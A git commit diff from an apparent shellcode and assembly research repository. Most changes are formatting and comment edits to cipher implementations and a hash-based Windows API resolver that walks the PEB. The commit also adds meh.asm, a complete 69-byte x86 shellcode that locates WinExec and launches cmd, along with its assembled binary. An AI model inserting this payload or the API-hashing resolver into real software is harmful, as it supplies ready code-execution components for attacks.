upd

odzhan · odzhan · commit 2eb95944f412 · 2019-04-14T15:56:59.000+01:00
diff --git a/os/linux/arm32/crypto/speck/spk.s b/os/linux/arm32/crypto/speck/spk.s
@@ -28,9 +28,8 @@
   POSSIBILITY OF SUCH DAMAGE. */
 
   .arm
-  .arch armv6  
+  .arch armv7
   .text
-  .align  2
   
   .global speck
 
diff --git a/os/linux/arm64/crypto/keccak/kpp.s b/os/linux/arm64/crypto/keccak/kpp.s
@@ -1,5 +1,5 @@
 
-// keccak-p[1600, 24]
+// keccak-f[1600, 24]
 // 428 bytes
 
     .arch armv8-a
diff --git a/os/linux/x86/crypto/rc6/rx.asm b/os/linux/x86/crypto/rc6/rx.asm
@@ -28,7 +28,7 @@
 ;  POSSIBILITY OF SUCH DAMAGE.
 ;
 ; -----------------------------------------------
-; RC6-128/256 Block Cipher in x86 assembly (Encryption only)
+; RC6-128/256 block cipher in x86 assembly (Encryption only)
 ;
 ; https://people.csail.mit.edu/rivest/pubs/RRSY98.pdf
 ;
diff --git a/os/win/getapi/dynamic/getapi.c b/os/win/getapi/dynamic/getapi.c
@@ -30,8 +30,7 @@
 #include "getapi.h"
   
 // converts string to lowercase
-uint32_t crc32c(const char *s)
-{
+uint32_t crc32c(const char *s) {
   int      i;
   uint32_t crc=0;
   
@@ -46,8 +45,7 @@ uint32_t crc32c(const char *s)
 }
 
 #ifndef ASM
-LPVOID search_exp(LPVOID base, DWORD hash)
-{
+LPVOID search_exp(LPVOID base, DWORD hash) {
   PIMAGE_DOS_HEADER       dos;
   PIMAGE_NT_HEADERS       nt;
   DWORD                   cnt, rva, dll_h;
@@ -94,8 +92,7 @@ LPVOID search_exp(LPVOID base, DWORD hash)
   return api_adr;
 }
 
-LPVOID search_imp(LPVOID base, DWORD hash)
-{
+LPVOID search_imp(LPVOID base, DWORD hash) {
   DWORD                    dll_h, i, rva;
   PIMAGE_IMPORT_DESCRIPTOR imp;
   PIMAGE_THUNK_DATA        oft, ft;
@@ -116,26 +113,29 @@ LPVOID search_imp(LPVOID base, DWORD hash)
 
   imp = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
   
-  for (i=0; api_adr==NULL; i++) 
-  {
+  for (i=0; api_adr==NULL; i++) {
+    // no more DLL to process?
     if (imp[i].Name == 0) return NULL;
     
-    // get DLL string, calc crc32c hash
+    // calculate crc32c hash of DLL string
     dll   = RVA2VA(PCHAR, base, imp[i].Name);
     dll_h = crc32c(dll); 
     
+    // obtain address of API names
     rva   = imp[i].OriginalFirstThunk;
     oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
     
+    // obtain address of API addresses
     rva   = imp[i].FirstThunk;
     ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
         
-    for (;; oft++, ft++) 
-    {
+    for (;; oft++, ft++) {
       if (oft->u1.Ordinal == 0) break;
+      
       // skip import by ordinal
       if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
       
+      // obtain address of API string
       rva = oft->u1.AddressOfData;
       ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
       
@@ -153,8 +153,7 @@ LPVOID search_imp(LPVOID base, DWORD hash)
  * Obtain address of API from PEB based on hash
  *
  ************************************************/
-LPVOID get_api (DWORD dwHash)
-{
+LPVOID get_api (DWORD dwHash) {
   PPEB                  peb;
   PPEB_LDR_DATA         ldr;
   PLDR_DATA_TABLE_ENTRY dte;
diff --git a/os/win/getapi/dynamic/x86.asm b/os/win/getapi/dynamic/x86.asm
@@ -199,7 +199,7 @@ _get_apix:
     pop    eax
 
     mov    eax, [fs:eax]  ; eax = (PPEB) __readfsdword(0x30);
-    mov    eax, [eax+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
+    mov    eax, [eax+0ch] ; eax = (PPEB_LDR_DATA)peb->Ldr
     mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
     jmp    gapi_l1
 gapi_l0:
diff --git a/os/win/x86/meh.asm b/os/win/x86/meh.asm
@@ -0,0 +1,41 @@
+
+; 69 bytes WinExec shellcode
+; odzhan
+; nasm -fbin meh.asm -omeh.bin
+
+      bits 32
+      
+      push   30h
+      pop    ecx
+      mov    eax, [fs:ecx]      ; eax = (PPEB) __readfsdword(0x30);
+      mov    eax, [eax+0ch]     ; eax = (PPEB_LDR_DATA)peb->Ldr
+      mov    esi, [eax+0ch]     ; edi = ldr->InLoadOrderModuleList.Flink
+      lodsd
+      mov    esi, [eax]
+      mov    ebx, [esi+18h]     ; ebx = DllBase
+      mov    eax, [ebx+3ch]     ; eax = IMAGE_DOS_HEADER.e_lfanew
+      mov    eax, [ebx+eax+78h] ; IMAGE_EXPORT_DIRECTORY.VirtualAddress
+      lea    esi, [ebx+eax+1ch] ; esi = offset IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
+      mov    cl, 3
+L1:
+      lodsd
+      add    eax, ebx
+      push   eax
+      loop   L1
+      pop    edx                ; edx = AddressOfNameOrdinals
+      pop    esi                ; esi = AddressOfNames
+      pop    edi                ; edi = AddressOfFunctions 
+L2:
+      movzx  ebp, word[edx+ecx*2]
+      lodsd
+      inc    ecx
+      cmp    dword[eax+ebx], 'WinE'
+      jne    L2     
+      add    ebx, [edi+ebp*4]   ; ebx = base + AddressOfFunctions[ebp]
+      mov    eax, ~'cmd'
+      not    eax
+      push   eax
+      push   esp
+      call   ebx
+      
+      
diff --git a/os/win/x86/meh.bin b/os/win/x86/meh.bin
@@ -0,0 +1 @@
+j0Yd��@�p��0�^�C<�Dx�t���P��Z^_�,J�A�<WinEu���������PT��

Original file line number	Diff line number	Diff line change
`@@ -28,7 +28,7 @@`
`28`	`28`	`; POSSIBILITY OF SUCH DAMAGE.`
`29`	`29`	`;`
`30`	`30`	`; -----------------------------------------------`
`31`		`-; RC6-128/256 Block Cipher in x86 assembly (Encryption only)`
	`31`	`+; RC6-128/256 block cipher in x86 assembly (Encryption only)`
`32`	`32`	`;`
`33`	`33`	`; https://people.csail.mit.edu/rivest/pubs/RRSY98.pdf`
`34`	`34`	`;`
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+j0Yd��@�p��0�^�C<�Dx�t��P��Z^_�,J�A�<WinEu��PT��`